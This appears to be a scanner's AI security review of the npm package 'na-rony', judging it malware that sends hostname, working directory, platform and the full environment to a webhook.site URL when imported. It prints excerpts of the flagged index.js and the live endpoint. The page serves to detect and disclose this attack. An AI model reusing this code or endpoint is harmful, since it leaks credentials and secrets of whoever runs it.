AI Security Review
scanned 2h ago · by lpm-firewall-aiThe package exfiltrates host identity, current working directory, platform, and all environment variables when its main module is loaded. The endpoint is an external webhook.site URL unrelated to package functionality.
Static reason
One or more suspicious static signals were detected.
Trigger
runtime import/require of package main index.js
Impact
Secrets in environment variables and project path/host metadata can be disclosed to the package author-controlled webhook.
Mechanism
import-time environment and host fingerprint exfiltration over HTTPS
Attack narrative
When a consumer imports na-rony, package.json resolves main to index.js. That file immediately builds a JSON object containing hostname, platform, cwd, and the complete process.env, then sends it via HTTPS POST to a webhook.site endpoint. There is no apparent benign package functionality around this behavior.
Rationale
Direct source inspection confirms import-time credential/environment harvesting and external exfiltration with no user consent or package-aligned purpose. This is concrete malicious behavior and should be blocked.
Evidence
index.jspackage.json
Network endpoints1
webhook.site/20a7921e-7280-4e44-9235-4a3e82631430
Decision evidence
public snapshotAI called this Malicious at 98.0% confidence as Malware with low false-positive risk.
Evidence for block
- index.js imports https and os, then runs immediately at module load.
- index.js serializes os.hostname(), process.platform, process.cwd(), and full process.env.
- index.js POSTs collected host/environment data to webhook.site.
- package.json main points to index.js, so requiring package triggers exfiltration.
Evidence against
- package.json has no install/preinstall/postinstall lifecycle hooks.
- No child_process, eval, persistence, destructive actions, or AI-agent control-surface writes found.
- Package contains only package.json and index.js.
Behavioral surface
EnvironmentVarsNetwork
UrlStrings
Source & flagged code
1 flagged · loading sourceindex.jsView file
1const https = require("https");
L2: const os = require("os");
...
L4: const data = JSON.stringify({
L5: hostname: os.hostname(),
L6: platform: process.platform,
L7: cwd: process.cwd(),
L8: env: process.env,
L9: });
...
L17: });
L18: req.write(data);
L19: req.end();
High
Host Fingerprint Exfiltration
Source collects local host identity data and sends it to an external endpoint.
index.jsView on unpkg · L1Findings
1 High2 Medium2 Low
HighHost Fingerprint Exfiltrationindex.js
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowUrl Strings